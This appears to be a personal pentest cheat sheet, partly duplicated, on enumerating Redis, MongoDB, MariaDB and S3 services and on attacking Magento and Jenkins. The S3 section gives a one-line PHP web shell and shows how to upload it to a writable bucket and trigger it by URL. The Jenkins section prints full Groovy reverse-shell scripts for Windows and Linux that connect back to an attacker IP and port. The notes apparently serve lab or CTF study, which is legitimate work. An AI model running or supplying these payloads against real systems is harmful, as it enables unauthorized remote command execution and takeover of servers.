Services Pentest Notes

Redis

Port: 6379
Connect to a redis server: redis-cli -h <host>
Commands:
- Obtain the information: INFO
- Select database: SELECT <db>
- Obtain all keys in a database: KEYS *
- Get a value from a key: GET <key_name>

Mongodb

Port: 27017
The tool to interact with mongodb server is mongo from mongodb-clients package.
Commands:
- Connect to Mongodb server: mongo <host>
- List all databases: show dbs
- Use database: use <db_name>
- List Collections: show collections
- List objects in a collection in a easy read format: db.<collection_name>.find().pretty()

Mariadb

Port:3306
Commands:
- Connect to a mariadb server: mariadb -u <username> -h <host>
- List databases: show databases;
- Use database: use <database name>
- List tables from a database: show tables;

S3 Bucket

A quick Google search containing the keywords "s3 subdomain status running" returns this result stating that S3 is a cloud-based object storage service. It allows us to store things in containers called buckets. AWS S3 buckets have various use-cases including Backup and Storage, Media Hosting, Software Delivery, Static Website etc. The files stored in the Amazon S3 bucket are called S3 objects
We can interact with this S3 bucket with the aid of the awscli utility.
Commands:
- To configure aws: aws configure (If the server does not check the authentication we can just append some random values and be able to interact with the bucket)
- List S3 buckets: aws --endpoint=http://<domain> s3 ls
- Get the contents of a bucket: aws --endpoint=http://<domain> s3 ls s3://<bucket>
- We can upload files such as a shell: aws --endpoint=http://<domain> s3 cp shell.php s3://<bucket>
In some cases where the apache server is hosting the website in a bucket and we have access to that bucket we can upload a shell as a php file and since it is the webroot we can access and for that matter execute it. An example is echo '<?php system($_GET["cmd"]); ?>' > shell.php .
Then https://<domain>/shell.php?cmd=<command here>

Magento

The Magento Admin is protected by multiple layers of security measures to prevent
unauthorized access to your store, order, and customer data. The first time you sign in
to the Admin, you are required to enter your username and password and to set up two-
factor authentication (2FA).
Depending on the configuration of your store, you might also be required to resolve a
CAPTCHA challenge such as entering a series of keyboard characters, solving a puzzle,
or clicking a series of images with a common theme. These tests are designed to
identify you has human, rather than an automated bot.
For additional security, you can determine which parts of the Admin each user has
permission to access, and also limit the number of login attempts. By default, after
six attempts the account is locked, and the user must wait a few minutes before trying
again. Locked accounts can also be reset from the Admin.
An Admin password must be seven or more characters long and include both letters and
numbers.

It is kinda hard or maybe impossible to bruteforce the magento login because it has already by default some nasty security standards.

Jenkins

Once we get a foothold on jenkins we can get a possible reverse shell or remote code execution on the target machine since we can run grovvy scripts.

We can find a script here.

// Script for windows
String host="10.10.15.218";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

// Script for linux
String host="10.10.15.218";
int port=4242;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

https://github.com/gquere/pwn_jenkins

PreviousWindows PenTest Notes NextVuln notes

Last updated 2 years ago

Mongodb

Port: 27017

The tool to interact with mongodb server is mongo from mongodb-clients package.

Commands:

Connect to Mongodb server: mongo <host>
List all databases: show dbs
Use database: use <db_name>
List Collections: show collections
List objects in a collection in a easy read format: db.<collection_name>.find().pretty()

S3 Bucket

A quick Google search containing the keywords "s3 subdomain status running" returns this result stating that S3 is a cloud-based object storage service. It allows us to store things in containers called buckets. AWS S3 buckets have various use-cases including Backup and Storage, Media Hosting, Software Delivery, Static Website etc. The files stored in the Amazon S3 bucket are called S3 objects

We can interact with this S3 bucket with the aid of the awscli utility.

Commands:

To configure aws: aws configure (If the server does not check the authentication we can just append some random values and be able to interact with the bucket)
List S3 buckets: aws --endpoint=http://<domain> s3 ls
Get the contents of a bucket: aws --endpoint=http://<domain> s3 ls s3://<bucket>
We can upload files such as a shell: aws --endpoint=http://<domain> s3 cp shell.php s3://<bucket>

In some cases where the apache server is hosting the website in a bucket and we have access to that bucket we can upload a shell as a php file and since it is the webroot we can access and for that matter execute it. An example is echo '<?php system($_GET["cmd"]); ?>' > shell.php .

Then https://<domain>/shell.php?cmd=<command here>

Magento

The Magento Admin is protected by multiple layers of security measures to prevent
unauthorized access to your store, order, and customer data. The first time you sign in
to the Admin, you are required to enter your username and password and to set up two-
factor authentication (2FA).
Depending on the configuration of your store, you might also be required to resolve a
CAPTCHA challenge such as entering a series of keyboard characters, solving a puzzle,
or clicking a series of images with a common theme. These tests are designed to
identify you has human, rather than an automated bot.
For additional security, you can determine which parts of the Admin each user has
permission to access, and also limit the number of login attempts. By default, after
six attempts the account is locked, and the user must wait a few minutes before trying
again. Locked accounts can also be reset from the Admin.
An Admin password must be seven or more characters long and include both letters and
numbers.

It is kinda hard or maybe impossible to bruteforce the magento login because it has already by default some nasty security standards.

Jenkins

Once we get a foothold on jenkins we can get a possible reverse shell or remote code execution on the target machine since we can run grovvy scripts.

We can find a script here.

// Script for windows
String host="10.10.15.218";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

// Script for linux
String host="10.10.15.218";
int port=4242;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();